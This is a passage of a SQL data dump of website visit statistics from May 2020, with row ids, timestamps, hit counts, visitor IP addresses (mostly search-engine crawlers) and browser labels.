222','other'),(503229,1588788273,1,1,0,0,'66.249.70.69','chrome'),(503230,1588788391,1,1,0,0,'207.46.13.40','other'),(503231,1588788508,2,2,0,0,'66.249.70.72','chrome'),(503232,1588789042,1,1,0,0,'17.58.101.26','other'),(503233,1588789685,1,1,0,0,'207.46.13.10','other'),(503234,1588790328,2,2,0,0,'66.249.70.72','chrome'),(503235,1588791284,1,1,0,0,'66.249.70.70','chrome'),(503236,1588792479,1,1,0,0,'207.46.13.40','other'),(503237,1588793372,1,1,0,0,'66.249.70.72','chrome'),(503238,1588793452,1,1,0,0,'176.122.101.34','chrome'),(503239,1588793639,1,1,0,0,'207.46.13.40','other'),(503240,1588793727,1,1,0,0,'66.249.70.69','chrome'),(503241,1588794510,1,1,0,0,'8.29.198.26','other'),(503242,1588794546,1,1,0,0,'66.249.70.72','chrome'),(503243,1588794853,1,1,0,0,'8.29.198.27','other'),(503244,1588795586,1,1,0,0,'17.58.101.26','other'),(503245,1588797387,1,1,0,0,'5.227.15.64','chrome'),(503246,1588797650,8,8,0,0,'77.120.98.235','other'),(503247,1588798164,1,1,0,0,'17.58.101.26','other'),(503248,1588798921,1,1,0,0,'66.249.64.33','chrome'),(503249,1588799121,1,1,0,0,'178.154.200.222','other'),(503250,1588799364,1,1,0,0,'17.58.101.26','other'),(503251,1588799646,1,1,0,0,'95.174.220.112','chrome'),(503252,1588800407,1,1,0,0,'178.93.148.34','chrome'),(503253,1588801710,1,1,0,0,'157.55.39.178','other'),(503254,1588801773,2,2,0,0,'66.249.70.69','chrome'),(503255,1588802223,2,2,0,0,'17.58.101.26','other'),(503256,1588803755,1,1,0,0,'17.58.101.26','other'),(503257,1588803969,2,2,0,0,'66.249.70.69','chrome'),(503258,1588805173,1,1,0,0,'178.159.37.88','chrome'),(503259,1588805333,1,1,0,0,'8.29.198.27','other'),(503260,1588805336,8,8,0,0,'77.120.98.235','other'),(503261,1588805454,1,1,0,0,'17.58.101.26','other'),(503262,1588805680,1,1,0,0,'8.29.198.25','other'),(503263,1588806896,1,1,0,0,'66.249.70.69','chrome'),(503264,1588807177,1,1,0,0,'17.58.101.26','other'),(503265,1588808198,2,2,0,0,'66.249.70.69','chrome'),(503266,1588808402,1,1,0,0,'213.180.203.142','other'),(503267,1588808459,1,1,0,0,'66.249.70.72','chrome'),(503268,1588808962,1,1,0,0,'66.249.64.33','chrome'),(503269,1588809306,1,1,0,0,'62.205.134.182','other'),(503270,1588810036,1,1,0,0,'213.180.203.140','other'),(503271,1588810889,1,1,0,0,'66.249.64.36','chrome'),(503272,1588811319,1,1,0,0,'157.55.39.178','other'),(503273,1588812759,1,1,0,0,'66.249.64.36','chrome'),(503274,1588812936,8,8,0,0,'77.120.98.235','other'),(503275,1588813428,1,1,0,0,'194.44.228.210','firefox'),(503276,1588814639,2,2,0,0,'17.58.101.26','other'),(503277,1588815581,3,3,0,0,'17.58.101.26','other'),(503278,1588816155,2,2,0,0,'8.29.198.25','other'),(503279,1588817860,2,2,0,0,'66.249.70.72','chrome'),(503280,1588818531,1,1,0,0,'17.58.101.26','other'),(503281,1588819072,1,1,0,0,'178.154.200.222','other'),(503282,1588820628,8,8,0,0,'77.120.98.235','other'),(503283,1588820885,1,1,0,0,'178.154.200.222','other'),(503284,1588821014,1,1,0,0,'66.249.64.36','chrome'),(503285,1588822104,1,1,0,0,'93.124.54.130','chrome'),(503286,1588823018,2,2,0,0,'157.55.39.154','other'),(503287,1588824079,1,1,0,0,'17.58.101.26','other'),(503288,1588824544,1,1,0,0,'66.249.64.36','chrome'),(503289,1588825279,1,1,0,0,'213.180.203.70','other'),(503290,1588825517,1,1,0,0,'17.58.101.26','other'),(503291,1588826772,1,1,0,0,'62.205.134.182','other'),(503292,1588826979,2,2,0,0,'8.29.198.25','other'),(503293,1588827041,1,1,0,0,'66.249.70.72','chrome'),(503294,1588827078,2,2,0,0,'17.58.101.26','other'),(503295,1588827514,2,2,0,0,'66.249.64.38','chrome'),(503296,1588828011,8,8,0,0,'77.120.98.235','other'),(503297,1588829261,1,1,0,0,'17.58.101.26','other'),(503298,1588829989,1,1,0,0,'66.249.70.72','chrome'),(503299,1588831198,2,2,0,0,'17.58.101.26','other'),(503300,1588831216,1,1,0,0,'66.249.70.72','chrome'),(503301,1588831571,1,1,0,0,'66.249.70.69','chrome'),(503302,1588831701,2,2,0,0,'77.111.244.57','chrome'),(503303,1588832594,1,1,0,0,'66.249.70.70','chrome'),(503304,1588834219,1,1,0,0,'66.249.70.69','chrome'),(503305,1588835415,8,8,0,0,'77.120.98.235','other'),(503306,1588835997,2,2,0,0,'157.55.39.154','other'),(503307,1588836329,1,1,0,0,'66.249.64.36','chrome'),(503308,1588837040,1,1,0,0,'131.220.6.152','chrome'),(503309,1588837114,1,1,0,0,'66.249.70.70','chrome'),(503310,1588837323,1,1,0,0,'31.13.127.21','other'),(503311,1588837324,1,1,0,0,'31.13.127.5','other'),(503314,1588837348,1,1,0,0,'31.13.127.14','other'),(503315,1588837349,1,1,0,0,'31.13.127.111','other'),(503316,1588837623,1,1,0,0,'37.73.72.2','chrome'),(503317,1588837708,1,1,0,0,'178.154.200.222','other'),(503318,1588837808,2,2,0,0,'8.29.198.27','other'),(503319,1588838103,1,1,0,0,'91.196.178.163','chrome'),(503320,1588838341,1,1,0,0,'66.249.70.72','chrome'),(503321,1588839127,1,1,0,0,'66.249.70.70','chrome'),(503322,1588840735,1,1,0,0,'66.249.70.69','chrome'),(503323,1588843034,8,8,0,0,'77.120.98.235','other'),(503324,1588843107,1,1,0,0,'91.196.178.25','chrome'),(503325,1588843141,1,1,0,0,'66.249.70.69','chrome'),(503326,1588843434,1,1,0,0,'91.196.178.68','chrome'),(503327,1588844091,1,1,0,0,'66.249.70.70','chrome'),(503328,1588844264,1,1,0,0,'66.249.70.72','chrome'),(503329,1588845749,1,1,0,0,'66.249.70.69','chrome'),(503330,1588845762,1,1,0,0,'3.80.7.177','chrome'),(503331,1588845886,1,1,0,0,'66.249.70.70','chrome'),(503332,1588846292,1,1,0,0,'54.219.95.125','chrome'),(503333,1588846299,11,11,0,0,'18.144.39.236','chrome'),(503334,1588846300,1,1,0,0,'13.57.218.202','chrome'),(503335,1588847366,1,1,0,0,'66.249.70.72','chrome'),(503336,1588848631,1,1,0,0,'8.29.198.27','other'),(503337,1588848870,1,1,0,0,'66.249.70.72','chrome'),(503338,1588848991,1,1,0,0,'8.29.198.26','other'),(503339,1588849010,1,1,0,0,'178.154.200.236','other'),(503340,1588849359,1,1,0,0,'109.74.154.72','chrome'),(503341,1588850366,1,1,0,0,'66.249.70.72','chrome'),(503342,1588851616,1,1,0,0,'66.249.70.72','chrome'),(503343,1588851627,3,3,0,0,'66.249.70.69','chrome'),(503344,1588851644,8,8,0,0,'77.120.98.235','other'),(503345,1588852722,1,1,0,0,'109.234.34.254','chrome'),(503346,1588853530,1,1,0,0,'34.213.221.100','firefox'),(503347,1588853540,1,1,0,0,'54.190.30.23','firefox'),(503348,1588853940,1,1,0,0,'178.154.200.220','other'),(503349,1588854201,1,1,0,0,'92.113.126.217','chrome'),(503350,1588854983,1,1,0,0,'66.249.70.72','chrome'),(503351,1588856168,1,1,0,0,'91.196.122.186','chrome'),(503352,1588856528,1,1,0,0,'213.180.203.16','other'),(503353,1588857373,1,1,0,0,'66.249.70.72','chrome'),(503354,1588857696,1,1,0,0,'66.249.64.33','chrome'),(503355,1588859211,1,1,0,0,'66.249.70.69','chrome'),(503356,1588859461,1,1,0,0,'8.29.198.25','other'),(503357,1588859835,1,1,0,0,'8.29.198.26','other'),(503358,1588860234,8,8,0,0,'77.120.98.235','other'),(503359,1588861125,1,1,0,0,'66.249.70.69','chrome'),(503360,1588861412,1,1,0,0,'213.180.203.16','other'),(503361,1588861651,1,1,0,0,'207.46.13.95','other'),(503362,1588863413,2,2,0,0,'95.132.24.66','firefox'),(503363,1588863423,1,1,0,0,'176.67.29.53','chrome'),(503364,1588865567,1,0,1,0,'66.249.70.72',''),(503365,1588866299,1,1,0,0,'195.181.168.182','chrome'),(503366,1588868197,8,8,0,0,'77.120.98.235','other'),(503367,1588868319,2,2,0,0,'207.46.13.95','other'),(503368,1588868540,1,1,0,0,'178.154.200.222','other'),(503369,1588870294,1,1,0,0,'8.29.198.25','other'),(503370,1588870669,1,1,0,0,'8.29.198.27','other'),(503371,1588871777,1,1,0,0,'66.249.64.38','chrome'),(503372,1588871991,1,1,0,0,'213.180.203.16','other'),(503373,1588872625,1,1,0,0,'17.58.101.26','other'),(503374,1588873449,1,1,0,0,'66.249.70.70','chrome'),(503375,1588874216,1,1,0,0,'178.154.200.97','other'),(503376,1588874676,1,0,1,0,'66.249.64.23',''),(503377,1588874814,1,1,0,0,'66.249.64.24','chrome'),(503378,1588874826,2,2,0,0,'157.55.39.40','other'),(503379,1588875104,1,1,0,0,'178.154.200.220','other'),(503380,1588875309,1,1,0,0,'91.196.178.136','chrome'),(503381,1588875601,1,1,0,0,'66.249.64.25','chrome'),(503382,1588875993,1,1,0,0,'173.252.111.117','other'),(503383,1588876172,8,8,0,0,'77.120.98.235','other'),(503384,1588876234,1,1,0,0,'178.154.200.222','other'),(503385,1588876850,1,1,0,0,'66.249.64.25','chrome'),(503386,1588877355,2,2,0,0,'207.46.13.117','other'),(503387,1588878196,1,1,0,0,'213.180.203.140','other'),(503388,1588878772,2,2,0,0,'66.249.70.72','chrome'),(503389,1588879080,2,2,0,0,'157.55.39.40','other'),(503390,1588879772,1,1,0,0,'66.249.70.70','chrome'),(503391,1588880475,1,1,0,0,'66.249.70.69','chrome'),(503392,1588880848,1,1,0,0,'173.252.111.19','other'),(503393,1588880849,1,1,0,0,'173.252.111.21','other'),(503394,1588880850,1,1,0,0,'173.252.111.4','other'),(503398,1588880893,2,2,0,0,'173.252.111.112','other'),(503399,1588880894,1,1,0,0,'173.252.111.13','other'),(503403,1588880913,1,1,0,0,'66.249.70.72','chrome'),(503404,1588881024,2,2,0,0,'66.249.70.70','chrome'),(503405,1588881124,1,1,0,0,'157.55.39.40','other'),(503406,1588881129,1,1,0,0,'8.29.198.26','other'),(503407,1588881502,1,1,0,0,'8.29.198.27','other'),(503408,1588882337,1,1,0,0,'66.249.64.36','chrome'),(503409,1588882351,1,1,0,0,'91.196.178.52','chrome'),(503410,1588882408,1,1,0,0,'173.252.127.32','other'),(503411,1588882875,1,1,0,0,'66.249.70.72','chrome'),(503412,1588883577,1,1,0,0,'66.249.64.24','chrome'),(503413,1588884244,4,4,0,0,'66.249.64.23','chrome'),(503414,1588884276,8,8,0,0,'77.120.98.235','other'),(503415,1588885622,1,1,0,0,'66.249.70.70','chrome'),(503416,1588885643,2,2,0,0,'66.249.70.69','chrome'),(503417,1588885966,1,1,0,0,'66.249.70.72','chrome'),(503418,1588887178,1,1,0,0,'157.55.39.40','other'),(503419,1588888177,1,1,0,0,'157.55.39.40','other'),(503420,1588889274,2,2,0,0,'72.13.62.26','other'),(503421,1588890561,1,1,0,0,'17.58.101.26','other'),(503422,1588891688,1,1,0,0,'207.46.13.117','other'),(503423,1588891955,1,1,0,0,'8.29.198.27','other'),(503424,1588892336,1,1,0,0,'8.29.198.26','other'),(503425,1588892570,8,8,0,0,'77.120.98.235','other'),(503426,1588892808,1,1,0,0,'66.249.70.69','chrome'),(503427,1588893465,1,1,0,0,'157.55.39.40','other'),(503428,1588893495,1,1,0,0,'66.249.64.24','chrome'),(503429,1588894291,1,1,0,0,'66.249.64.25','chrome'),(503430,1588895379,1,1,0,0,'178.154.200.222','other'),(503431,1588895706,1,1,0,0,'62.205.134.182','other'),(503432,1588896766,1,1,0,0,'66.249.70.69','chrome'),(503433,1588897079,1,1,0,0,'157.55.39.40','other'),(503434,1588897420,1,1,0,0,'66.249.70.70','chrome'),(503435,1588898683,2,2,0,0,'157.55.39.40','other'),(503436,1588899935,1,1,0,0,'207.46.13.117','other'),(503437,1588900595,8,8,0,0,'77.120.98.235','other'),(503438,1588900747,1,1,0,0,'66.249.70.72','chrome'),(503439,1588900887,1,1,0,0,'66.249.70.70','chrome'),(503440,1588901563,1,1,0,0,'213.180.203.142','other'),(503441,1588901912,1,1,0,0,'66.249.70.72','chrome'),(503442,1588901964,1,1,0,0,'66.249.70.70','chrome'),(503443,1588902285,1,0,1,0,'66.249.70.69',''),(503444,1588902783,2,2,0,0,'8.29.198.25','other'),(503445,1588903073,2,2,0,0,'66.249.70.72','chrome'),(503446,1588903074,1,1,0,0,'157.55.39.40','other'),(503447,1588903523,1,1,0,0,'66.249.64.38','chrome'),(503448,1588903835,4,4,0,0,'66.249.70.69','chrome'),(503449,1588903942,1,1,0,0,'66.249.70.70','chrome'),(503450,1588903996,2,2,0,0,'66.249.70.72','chrome'),(503451,1588904534,1,1,0,0,'66.249.64.36','chrome'),(503452,1588905171,1,1,0,0,'66.249.70.70','chrome'),(503453,1588905429,1,1,0,0,'66.249.70.69','chrome'),(503454,1588906254,1,1,0,0,'207.46.13.117','other'),(503455,1588906693,1,1,0,0,'91.209.11.236','other'),(503456,1588907418,1,1,0,0,'66.249.70.70','chrome'),(503457,1588908213,1,1,0,0,'157.55.39.40','other'),(503458,1588908598,8,8,0,0,'77.120.98.235','other'),(503459,1588908847,2,2,0,0,'207.46.13.117','other'),(503460,1588909328,1,1,0,0,'66.249.70.69','chrome'),(503461,1588909528,1,1,0,0,'91.78.31.33','chrome'),(503462,1588909536,1,1,0,0,'176.213.205.56','chrome'),(503463,1588910832,2,2,0,0,'66.249.70.69','chrome'),(503464,1588911477,1,1,0,0,'157.55.39.40','other'),(503465,1588911728,1,1,0,0,'37.73.193.250','chrome'),(503466,1588912513,2,2,0,0,'66.249.70.69','chrome'),(503467,1588913233,1,1,0,0,'62.205.134.182','other'),(503468,1588913448,2,2,0,0,'66.249.70.70','chrome'),(503469,1588913614,1,1,0,0,'8.29.198.27','other'),(503470,1588913665,1,1,0,0,'66.249.70.69','chrome'),(503471,1588913989,1,1,0,0,'8.29.198.25','other'),(503472,1588914310,2,2,0,0,'66.249.70.72','chrome'),(503473,1588915804,1,1,0,0,'209.17.97.10','other'),(503474,1588916665,2,2,0,0,'91.196.178.93','chrome'),(503475,1588916920,8,8,0,0,'77.120.98.235','other'),(503476,1588916980,1,1,0,0,'91.196.178.169','chrome'),(503477,1588917506,1,1,0,0,'17.58.101.26','other'),(503478,1588918176,1,1,0,0,'91.196.178.169','chrome'),(503479,1588918979,1,1,0,0,'91.196.178.93','chrome'),(503480,1588919388,1,1,0,0,'157.55.39.40','other'),(503481,1588920177,1,1,0,0,'91.196.178.122','chrome'),(503482,1588920796,1,1,0,0,'91.196.178.93','chrome'),(503483,1588921099,2,2,0,0,'66.249.70.72','chrome'),(503484,1588921135,1,1,0,0,'78.154.163.58','chrome'),(503485,1588921767,1,1,0,0,'91.196.178.169','chrome'),(503486,1588921930,1,1,0,0,'157.55.39.40','other'),(503487,1588922111,1,1,0,0,'34.217.147.229','firefox'),(503488,1588922608,1,1,0,0,'54.202.79.215','firefox'),(503489,1588922761,1,1,0,0,'66.249.70.69','chrome'),(503490,1588922850,1,1,0,0,'207.46.13.117','other'),(503491,1588923749,1,1,0,0,'131.220.6.152','chrome'),(503492,1588923909,1,1,0,0,'178.154.200.222','other'),(503493,1588923917,1,1,0,0,'207.46.13.117','other'),(503494,1588924443,1,1,0,0,'8.29.198.25','other'),(503495,1588924612,1,1,0,0,'17.58.101.26','other'),(503496,1588924712,8,8,0,0,'77.120.98.235','other'),(503497,1588924825,1,1,0,0,'8.29.198.26','other'),(503498,1588925049,2,2,0,0,'207.46.13.117','other'),(503499,1588925143,2,2,0,0,'157.55.39.102','other'),(503500,1588925965,3,3,0,0,'207.46.13.117','other'),(503501,1588926734,1,1,0,0,'66.249.64.38','chrome'),(503502,1588927210,1,1,0,0,'66.249.70.72','chrome'),(503503,1588927595,1,1,0,0,'212.26.142.26','firefox'),(503504,1588928532,2,2,0,0,'212.26.142.26','firefox'),(503505,1588929555,1,0,1,0,'66.249.70.72',''),(503506,1588929565,2,2,0,0,'66.249.64.36','chrome'),(503507,1588929800,1,1,0,0,'66.249.70.72','chrome'),(503508,1588929907,1,1,0,0,'178.154.200.97','other'),(503509,1588930269,2,2,0,0,'178.154.200.222','other'),(503510,1588930821,1,1,0,0,'18.220.45.148','chrome'),(503511,1588930850,1,1,0,0,'213.180.203.16','other'),(503512,1588931396,1,1,0,0,'66.249.70.70','chrome'),(503513,1588931883,1,1,0,0,'66.249.70.72','chrome'),(503514,1588932113,2,2,0,0,'66.249.70.69','chrome'),(503515,1588932308,4,4,0,0,'178.154.200.222','other'),(503516,1588933108,1,1,0,0,'66.249.70.70','chrome'),(503517,1588933548,1,1,0,0,'207.46.13.117','other'),(503518,1588933669,1,1,0,0,'157.55.39.102','other'),(503519,1588934149,2,1,1,0,'66.249.70.69',''),(503520,1588934708,2,2,0,0,'66.249.70.72','chrome'),(503521,1588934881,1,1,0,0,'178.154.200.222','other'),(503522,1588934931,1,1,0,0,'66.249.70.70','chrome'),(503523,1588935283,2,2,0,0,'8.29.198.26','other'),(503524,1588935838,8,8,0,0,'77.120.98.235','other'),(503525,1588936050,1,1,0,0,'178.154.200.220','other'),(503526,1588936071,1,1,0,0,'66.249.70.72','chrome'),(503527,1588936269,3,3,0,0,'178.154.200.222','other'),(503528,1588936692,1,1,0,0,'66.249.70.70','chrome'),(503529,1588936725,1,1,0,0,'109.74.154.72','chrome'),(503530,1588936988,1,1,0,0,'66.249.70.69','chrome'),(503531,1588937171,2,2,0,0,'66.249.70.72','chrome'),(503532,1588937239,1,1,0,0,'178.154.200.112','other'),(503533,1588937500,1,1,0,0,'213.180.203.16','other'),(503534,1588937999,1,1,0,0,'178.154.200.222','other'),(503535,1588938723,1,1,0,0,'213.180.203.16','other'),(503536,1588939051,1,1,0,0,'194.61.24.94','other'),(503537,1588939330,3,3,0,0,'178.154.200.222','other'),(503538,1588939481,2,2,0,0,'66.249.64.38','chrome'),(503539,1588939482,1,1,0,0,'66.249.70.70','chrome'),(503540,1588939760,1,1,0,0,'213.180.203.16','other'),(503541,1588939869,1,1,0,0,'91.196.178.59','chrome'),(503542,1588940013,1,1,0,0,'157.55.39.102','other'),(503543,1588940172,1,1,0,0,'46.219.6.40','firefox'),(503544,1588940174,1,1,0,0,'178.154.200.220','other'),(503545,1588940539,1,1,0,0,'66.249.70.69','chrome'),(503546,1588940653,3,3,0,0,'178.154.200.222','other'),(503547,1588940944,1,1,0,0,'31.0.47.53','chrome'),(503548,1588941224,1,1,0,0,'31.13.127.113','other'),(503549,1588941225,1,1,0,0,'31.13.127.8','other'),(503552,1588941226,1,1,0,0,'31.13.127.24','other'),(503557,1588941271,1,1,0,0,'31.13.127.1','other'),(503558,1588941648,1,1,0,0,'66.249.70.69','chrome'),(503559,1588941682,1,1,0,0,'91.196.178.25','chrome'),(503560,1588941857,1,1,0,0,'66.249.70.72','chrome'),(503561,1588942026,1,1,0,0,'178.154.200.220','other'),(503562,1588942153,1,1,0,0,'66.249.64.38','chrome'),(503563,1588942668,2,2,0,0,'178.154.200.222','other'),(503564,1588943126,8,8,0,0,'77.120.98.235','other'),(503565,1588943537,1,1,0,0,'91.196.178.25','chrome'),(503566,1588943538,2,2,0,0,'66.249.70.69','chrome'),(503567,1588944012,1,0,1,0,'66.249.70.70',''),(503568,1588944157,1,1,0,0,'178.154.200.196','other'),(503569,1588944629,1,1,0,0,'91.196.178.25','chrome'),(503570,1588945038,1,1,0,0,'66.249.70.72','chrome'),(503571,1588945382,1,1,0,0,'178.95.47.206','chrome'),(503572,1588945476,1,1,0,0,'66.249.70.69','chrome'),(503573,1588945583,1,1,0,0,'62.210.143.10','other'),(503574,1588945716,1,1,0,0,'91.196.178.59','chrome'),(503575,1588946115,1,1,0,0,'8.29.198.25','other'),(503576,1588946492,1,1,0,0,'8.29.198.26','other'),(503577,1588946781,1,1,0,0,'37.73.210.145','chrome'),(503578,1588946914,2,2,0,0,'66.249.70.69','chrome'),(503579,1588947200,2,2,0,0,'66.249.70.70','chrome'),(503580,1588947259,1,1,0,0,'66.249.70.72','chrome'),(503581,1588947331,1,1,0,0,'66.249.64.33','chrome'),(503582,1588947794,2,2,0,0,'178.154.200.97','other'),(503583,1588947877,1,1,0,0,'185.53.79.222','firefox'),(503584,1588948169,2,2,0,0,'178.154.200.222','other'),(503585,1588948467,1,1,0,0,'79.142.76.202','firefox'),(503586,1588949089,1,1,0,0,'66.249.64.33','chrome'),(503587,1588949370,1,1,0,0,'207.46.13.243','other'),(503588,1588950546,1,1,0,0,'157.55.39.102','other'),(503589,1588950657,1,1,0,0,'66.249.70.72','chrome'),(503590,1588951056,1,1,0,0,'66.249.70.69','chrome'),(503591,1588951231,1,1,0,0,'95.134.221.99','other'),(503592,1588951306,8,8,0,0,'77.120.98.235','other'),(503593,1588951322,1,1,0,0,'213.180.203.17','other'),(503594,1588951613,1,1,0,0,'178.154.200.191','other'),(503595,1588951879,2,2,0,0,'66.249.70.72','chrome'),(503596,1588952572,2,2,0,0,'66.249.70.70','chrome'),(503597,1588952578,1,1,0,0,'66.249.70.69','chrome'),(503598,1588953877,1,1,0,0,'66.249.70.70','chrome'),(503599,1588953952,1,1,0,0,'66.249.70.72','chrome'),(503600,1588954445,1,1,0,0,'207.46.13.243','other'),(503601,1588956372,1,1,0,0,'46.211.138.55','chrome'),(503602,1588956549,1,1,0,0,'66.249.70.70','chrome'),(503603,1588956923,1,1,0,0,'17.58.101.26','other'),(503604,1588956949,2,2,0,0,'8.29.198.25','other'),(503605,1588957113,1,1,0,0,'66.249.64.38','chrome'),(503606,1588957488,1,1,0,0,'66.249.70.70','chrome'),(503607,1588957972,1,1,0,0,'207.46.13.243','other'),(503608,1588958025,2,2,0,0,'107.178.194.198','chrome'),(503609,1588958101,1,1,0,0,'66.249.70.72','chrome'),(503610,1588958294,1,1,0,0,'94.153.21.23','other'),(503611,1588959180,1,1,0,0,'66.249.70.69','chrome'),(503612,1588959256,2,2,0,0,'207.46.13.243','other'),(503613,1588959487,1,1,0,0,'77.74.177.113','chrome'),(503614,1588959514,8,8,0,0,'77.120.98.235','other'),(503615,1588959904,1,1,0,0,'91.196.178.25','chrome'),(503616,1588960035,1,1,0,0,'46.133.4.253','chrome'),(503617,1588960898,1,1,0,0,'66.249.70.69','chrome'),(503618,1588961719,1,1,0,0,'213.180.203.95','other'),(503619,1588962177,1,1,0,0,'178.154.200.216','other'),(503620,1588962239,1,1,0,0,'178.154.200.222','other'),(503621,1588964152,1,1,0,0,'185.250.241.23','firefox'),(503622,1588967381,8,8,0,0,'77.120.98.235','other'),(503623,1588967785,1,1,0,0,'8.29.198.26','other'),(503624,1588967864,1,1,0,0,'178.154.200.222','other'),(503625,1588968145,1,1,0,0,'8.29.198.25','other'),(503626,1588968355,1,1,0,0,'213.180.203.16','other'),(503627,1588968384,1,1,0,0,'66.249.70.70','chrome'),(503628,1588968740,1,1,0,0,'66.249.64.38','chrome'),(503629,1588968885,1,1,0,0,'17.58.101.26','other'),(503630,1588969566,1,1,0,0,'207.46.13.243','other'),(503631,1588970286,1,1,0,0,'91.196.178.25','chrome'),(503632,1588970867,1,1,0,0,'178.154.200.222','other'),(503633,1588971065,2,2,0,0,'66.249.70.69','chrome'),(503634,1588971758,1,1,0,0,'95.217.104.173','chrome'),(503635,1588972723,1,1,0,0,'66.249.70.72','chrome'),(503636,1588973959,1,1,0,0,'66.249.70.69','chrome'),(503637,1588974040,1,1,0,0,'66.249.70.72','chrome'),(503638,1588975286,8,8,0,0,'77.120.98.235','other'),(503639,1588975651,1,1,0,0,'66.249.70.70','chrome'),(503640,1588976652,1,1,0,0,'207.46.13.243','other'),(503641,1588976687,1,1,0,0,'171.244.139.26','chrome'),(503642,1588977630,1,1,0,0,'66.249.64.33','chrome'),(503643,1588977905,1,1,0,0,'66.249.70.72','chrome'),(503644,1588978619,1,1,0,0,'8.29.198.25','other'),(503645,1588978688,1,1,0,0,'17.58.101.26','other'),(503646,1588978971,1,1,0,0,'8.29.198.26','other'),(503647,1588979410,1,1,0,0,'207.46.13.243','other'),(503648,1588979803,1,1,0,0,'66.249.70.69','chrome'),(503649,1588980586,1,1,0,0,'207.46.13.104','other'),(503650,1588980905,1,1,0,0,'66.249.70.70','chrome'),(503651,1588981142,1,1,0,0,'207.46.13.243','other'),(503652,1588981334,3,3,0,0,'66.249.70.69','chrome'),(503653,1588981540,1,1,0,0,'213.180.203.16','other'),(503654,1588981969,1,1,0,0,'66.249.70.70','chrome'),(503655,1588982106,1,1,0,0,'62.205.134.182','other'),(503656,1588982494,1,1,0,0,'66.249.64.33','chrome'),(503657,1588982887,8,8,0,0,'77.120.98.235','other'),(503658,1588983582,1,1,0,0,'178.154.200.222','other'),(503659,1588983641,1,1,0,0,'66.249.70.72','chrome'),(503660,1588984053,1,1,0,0,'207.46.13.126','other'),(503661,1588984309,1,1,0,0,'66.249.64.36','chrome'),(503662,1588984640,1,1,0,0,'51.77.52.160','chrome'),(503663,1588984649,1,1,0,0,'213.180.203.122','other'),(503664,1588986458,1,1,0,0,'66.249.70.69','chrome'),(503665,1588986951,1,1,0,0,'207.46.13.75','other'),(503666,1588987131,1,1,0,0,'66.249.64.38','chrome'),(503667,1588988176,7,7,0,0,'178.62.74.6','chrome'),(503668,1588988525,2,2,0,0,'66.249.70.69','chrome'),(503669,1588988535,1,1,0,0,'66.249.70.70','chrome'),(503670,1588988906,1,1,0,0,'66.249.70.72','chrome'),(503671,1588989446,1,1,0,0,'8.29.198.26','other'),(503672,1588989625,1,1,0,0,'207.46.13.75','other'),(503673,1588989806,1,1,0,0,'8.29.198.25','other'),(503674,1588990003,2,1,1,0,'66.249.70.70',''),(503675,1588990284,1,1,0,0,'207.46.13.243','other'),(503676,1588990339,2,2,0,0,'66.249.70.72','chrome'),(503677,1588990507,8,8,0,0,'77.120.98.235','other'),(503678,1588991139,1,1,0,0,'66.249.70.69','chrome'),(503679,1588991261,1,1,0,0,'207.46.13.126','other'),(503680,1588991384,1,1,0,0,'66.249.70.72','chrome'),(503681,1588992395,1,1,0,0,'66.249.70.70','chrome'),(503682,1588992766,2,2,0,0,'213.180.203.16','other'),(503683,1588993839,1,1,0,0,'66.249.70.70','chrome'),(503684,1588995214,1,1,0,0,'207.46.13.243','other'),(503685,1588995470,1,1,0,0,'207.46.13.75','other'),(503686,1588996836,1,1,0,0,'66.249.64.36','chrome'),(503687,1588997028,1,1,0,0,'66.249.70.72','chrome'),(503688,1588997576,1,1,0,0,'66.249.70.69','chrome'),(503689,1588997679,1,1,0,0,'207.46.13.126','other'),(503690,1588998564,1,1,0,0,'66.249.70.70','chrome'),(503691,1588998586,8,8,0,0,'77.120.98.235','other'),(503692,1588999667,1,1,0,0,'62.205.134.182','other'),(503693,1588999965,1,1,0,0,'213.180.203.16','other'),(503694,1589000275,1,1,0,0,'8.29.198.25','other'),(503695,1589000634,1,1,0,0,'8.29.198.26','other'),(503696,1589000976,1,1,0,0,'66.249.64.36','chrome'),(503697,1589001425,1,1,0,0,'66.249.70.69','chrome'),(503698,1589001542,1,1,0,0,'91.196.178.21','chrome'),(503699,1589002278,1,1,0,0,'192.71.225.127','other'),(503700,1589003489,1,1,0,0,'207.46.13.243','other'),(503701,1589004167,1,1,0,0,'66.249.64.33','chrome'),(503702,1589004321,5,5,0,0,'5.9.151.57','other'),(503703,1589004891,1,1,0,0,'37.73.99.122','chrome'),(503704,1589005122,1,1,0,0,'207.46.13.243','other'),(503705,1589006034,8,8,0,0,'77.120.98.235','other'),(503706,1589006121,2,2,0,0,'207.46.13.75','other'),(503707,1589007411,1,1,0,0,'66.249.64.38','chrome'),(503708,1589008730,1,1,0,0,'46.211.38.96','chrome'),(503709,1589009122,1,1,0,0,'66.249.70.70','chrome'),(503710,1589009368,2,2,0,0,'66.249.70.69','chrome'),(503711,1589009728,1,1,0,0,'131.220.6.152','chrome'),(503712,1589009929,1,1,0,0,'207.46.13.243','other'),(503713,1589010445,1,1,0,0,'66.249.64.36','chrome'),(503714,1589010836,1,1,0,0,'91.196.178.155','chrome'),(503715,1589011022,2,2,0,0,'207.46.13.243','other'),(503716,1589011116,1,1,0,0,'8.29.198.26','other'),(503717,1589011147,1,1,0,0,'207.46.13.75','other'),(503718,1589011466,1,1,0,0,'8.29.198.25','other'),(503719,1589012007,1,1,0,0,'207.46.13.243','other'),(503720,1589013002,1,1,0,0,'207.46.13.157','other'),(503721,1589013548,8,8,0,0,'77.120.98.235','other'),(503722,1589014800,1,1,0,0,'66.249.70.72','chrome'),(503723,1589014877,1,1,0,0,'66.249.70.69','chrome'),(503724,1589015477,3,3,0,0,'66.249.70.70','chrome'),(503725,1589015492,2,2,0,0,'91.196.178.74','firefox'),(503726,1589016645,3,3,0,0,'173.208.218.130','other'),(503727,1589016700,1,1,0,0,'66.249.70.69','chrome'),(503728,1589016911,1,1,0,0,'66.249.70.70','chrome'),(503729,1589017149,1,1,0,0,'91.196.178.21','chrome'),(503730,1589017166,1,0,1,0,'66.249.70.72',''),(503731,1589017911,1,1,0,0,'66.249.70.69','chrome'),(503732,1589018523,1,1,0,0,'66.249.64.36','chrome'),(503733,1589019330,2,2,0,0,'66.249.70.72','chrome'),(503734,1589019906,1,1,0,0,'66.249.70.70','chrome'),(503735,1589020387,1,1,0,0,'46.211.220.63','chrome'),(503736,1589020618,1,1,0,0,'66.249.70.72','chrome'),(503737,1589021217,1,1,0,0,'66.249.70.69','chrome'),(503738,1589021310,8,8,0,0,'77.120.98.235','other'),(503739,1589021742,1,1,0,0,'194.61.24.94','other'),(503740,1589021872,1,1,0,0,'109.74.154.72','chrome'),(503741,1589021897,1,1,0,0,'144.76.38.10','other'),(503742,1589021946,2,2,0,0,'8.29.